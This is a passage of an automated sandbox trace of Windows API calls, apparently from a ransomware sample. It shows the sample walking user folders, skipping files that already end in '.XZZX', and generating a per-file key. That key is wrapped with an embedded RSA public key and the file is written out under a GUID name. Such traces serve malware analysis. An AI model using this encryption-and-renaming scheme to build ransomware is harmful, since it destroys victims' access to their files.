f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0112.547] lstrcpyW (in: lpString1=0x420f460, lpString2="D9B986602FBC15FEC37446303428FA46.XZZX" | out: lpString1="D9B986602FBC15FEC37446303428FA46.XZZX") returned="D9B986602FBC15FEC37446303428FA46.XZZX" [0112.547] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0112.547] SetErrorMode (uMode=0x1) returned 0x1 [0112.547] lstrcpyW (in: lpString1=0x420f860, lpString2="D9B986602FBC15FEC37446303428FA46.XZZX" | out: lpString1="D9B986602FBC15FEC37446303428FA46.XZZX") returned="D9B986602FBC15FEC37446303428FA46.XZZX" [0112.547] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x9b381512, Data2=0x23c1, Data3=0x41db, Data4=([0]=0x97, [1]=0x81, [2]=0x6, [3]=0x6, [4]=0x1b, [5]=0xa8, [6]=0x3a, [7]=0x5))) returned 0x0 [0112.547] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\D9B986602FBC15FEC37446303428FA46.XZZX") returned 94 [0112.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0112.547] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\B02958920932971B9B3815120D537B63.XZZX") returned 94 [0112.547] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 344 os_tid = 0x860 [0112.701] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0112.701] lstrcpyW (in: lpString1=0x420f460, lpString2="FD9D491315D8C1EEE26AF31719F0A636.XZZX" | out: lpString1="FD9D491315D8C1EEE26AF31719F0A636.XZZX") returned="FD9D491315D8C1EEE26AF31719F0A636.XZZX" [0112.701] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0112.701] SetErrorMode (uMode=0x1) returned 0x1 [0112.701] lstrcpyW (in: lpString1=0x420f860, lpString2="FD9D491315D8C1EEE26AF31719F0A636.XZZX" | out: lpString1="FD9D491315D8C1EEE26AF31719F0A636.XZZX") returned="FD9D491315D8C1EEE26AF31719F0A636.XZZX" [0112.701] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x91856208, Data2=0x677a, Data3=0x491f, Data4=([0]=0x9f, [1]=0x6c, [2]=0x97, [3]=0x20, [4]=0xc2, [5]=0x56, [6]=0x2, [7]=0x4d))) returned 0x0 [0112.701] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\FD9D491315D8C1EEE26AF31719F0A636.XZZX") returned 94 [0112.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0112.701] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\0401EFD01D8E51C69185620821AF360E.XZZX") returned 94 [0112.701] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 345 os_tid = 0x864 [0112.863] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0112.863] lstrcpyW (in: lpString1=0x420f460, lpString2="02D36BF7229FBF1A2D198367271CA362.XZZX" | out: lpString1="02D36BF7229FBF1A2D198367271CA362.XZZX") returned="02D36BF7229FBF1A2D198367271CA362.XZZX" [0112.863] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0112.863] SetErrorMode (uMode=0x1) returned 0x1 [0112.863] lstrcpyW (in: lpString1=0x420f860, lpString2="02D36BF7229FBF1A2D198367271CA362.XZZX" | out: lpString1="02D36BF7229FBF1A2D198367271CA362.XZZX") returned="02D36BF7229FBF1A2D198367271CA362.XZZX" [0112.863] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xa019e673, Data2=0xb4db, Data3=0x4e3e, Data4=([0]=0xb0, [1]=0x4b, [2]=0xc1, [3]=0x29, [4]=0x6d, [5]=0x57, [6]=0xe2, [7]=0xd4))) returned 0x0 [0112.863] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\02D36BF7229FBF1A2D198367271CA362.XZZX") returned 77 [0112.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0112.864] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\2C3100613746870AA019E6733B676B52.XZZX") returned 77 [0112.864] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 346 os_tid = 0x868 [0113.013] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0113.013] lstrcpyW (in: lpString1=0x420f460, lpString2="61C67744188385C0EADA50E91CF06A08.XZZX" | out: lpString1="61C67744188385C0EADA50E91CF06A08.XZZX") returned="61C67744188385C0EADA50E91CF06A08.XZZX" [0113.013] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0113.013] SetErrorMode (uMode=0x1) returned 0x1 [0113.013] lstrcpyW (in: lpString1=0x420f860, lpString2="61C67744188385C0EADA50E91CF06A08.XZZX" | out: lpString1="61C67744188385C0EADA50E91CF06A08.XZZX") returned="61C67744188385C0EADA50E91CF06A08.XZZX" [0113.013] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x4b686c2, Data2=0xc1d7, Data3=0x4a82, Data4=([0]=0x80, [1]=0xef, [2]=0xf4, [3]=0xc3, [4]=0x28, [5]=0xa, [6]=0x37, [7]=0xaa))) returned 0x0 [0113.013] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\61C67744188385C0EADA50E91CF06A08.XZZX") returned 77 [0113.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0113.014] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\90E36EEE386A952E04B686C23C8B7976.XZZX") returned 77 [0113.014] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 347 os_tid = 0x86c [0113.169] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0113.169] lstrcpyW (in: lpString1=0x420f460, lpString2="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" | out: lpString1="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX") returned="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" [0113.169] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0113.169] SetErrorMode (uMode=0x1) returned 0x1 [0113.169] lstrcpyW (in: lpString1=0x420f860, lpString2="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" | out: lpString1="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX") returned="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" [0113.169] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xdb318ed9, Data2=0xed10, Data3=0x4708, Data4=([0]=0x86, [1]=0xc0, [2]=0x52, [3]=0x31, [4]=0x9c, [5]=0x9, [6]=0x34, [7]=0xac))) returned 0x0 [0113.169] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX") returned 77 [0113.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0113.169] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\9457D29041C6D880DB318ED945E7BCC8.XZZX") returned 77 [0113.169] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 348 os_tid = 0x870 [0113.325] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0113.325] lstrcpyW (in: lpString1=0x420f460, lpString2="Desktop.lnk" | out: lpString1="Desktop.lnk") returned="Desktop.lnk" [0113.325] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0113.325] SetErrorMode (uMode=0x1) returned 0x1 [0113.325] lstrcpyW (in: lpString1=0x420f860, lpString2="Desktop.lnk" | out: lpString1="Desktop.lnk") returned="Desktop.lnk" [0113.325] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xc06cf7b7, Data2=0xdd4c, Data3=0x485a, Data4=([0]=0xab, [1]=0x29, [2]=0x7e, [3]=0xd4, [4]=0xad, [5]=0x31, [6]=0xb7, [7]=0xde))) returned 0x0 [0113.325] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 51 [0113.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0113.325] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\323285543E8B2CB8C06CF7B742AC1100.XZZX") returned 77 [0113.326] StrStrW (lpFirst="Desktop.lnk", lpSrch="XZZX") returned 0x0 [0113.326] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", dwFileAttributes=0x20) returned 1 [0113.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c8 [0113.327] ReadFile (in: hFile=0x4c8, lpBuffer=0x3bae68, nNumberOfBytesToRead=0x1e6, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3bae68*, lpNumberOfBytesRead=0x420e418*=0x1e6, lpOverlapped=0x0) returned 1 [0113.327] CloseHandle (hObject=0x4c8) returned 1 [0113.328] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0113.328] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0113.328] SetErrorMode (uMode=0x1) returned 0x1 [0113.329] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0113.329] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ca3aa0) returned 1 [0113.332] CryptGenKey (in: hProv=0x3ca3aa0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5590) returned 1 [0113.480] CryptExportKey (in: hKey=0x3a5590, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0113.480] CryptExportKey (in: hKey=0x3a5590, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0113.480] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0113.481] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0113.481] CryptDestroyKey (hKey=0x3a5590) returned 1 [0113.481] CryptReleaseContext (hProv=0x3ca3aa0, dwFlags=0x0) returned 1 [0113.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\323285543E8B2CB8C06CF7B742AC1100.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\323285543e8b2cb8c06cf7b742ac1100.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c8 [0113.481] WriteFile (in: hFile=0x4c8, lpBuffer=0x3bae68*, nNumberOfBytesToWrite=0x1e6, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3bae68*, lpNumberOfBytesWritten=0x420e438*=0x1e6, lpOverlapped=0x0) returned 1 [0113.482] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1e6 [0113.482] WriteFile (in: hFile=0x4c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0113.482] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1eb [0113.482] WriteFile (in: hFile=0x4c8, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x16, lpOverlapped=0x0) returned 1 [0113.482] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x201 [0113.482] WriteFile (in: hFile=0x4c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0113.482] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0113.482] SetErrorMode (uMode=0x1) returned 0x1 [0113.482] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0113.482] OutputDebugStringW (lpOutputString="end") [0113.483] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0113.483] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0113.483] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3ca3aa0) returned 1 [0113.483] CryptImportPublicKeyInfo (in: hCryptProv=0x3ca3aa0, dwCertEncodingType=0x1, pInfo=0x3cb0588*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb05b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb05c0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5690) returned 1 [0113.483] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0113.484] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0113.484] CryptEncrypt (in: hKey=0x3a5690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0113.484] CryptEncrypt (in: hKey=0x3a5690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3b6348*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3b6348*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0113.484] WriteFile (in: hFile=0x4c8, lpBuffer=0x3b6348*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3b6348*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0113.484] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0113.484] WriteFile (in: hFile=0x4c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, 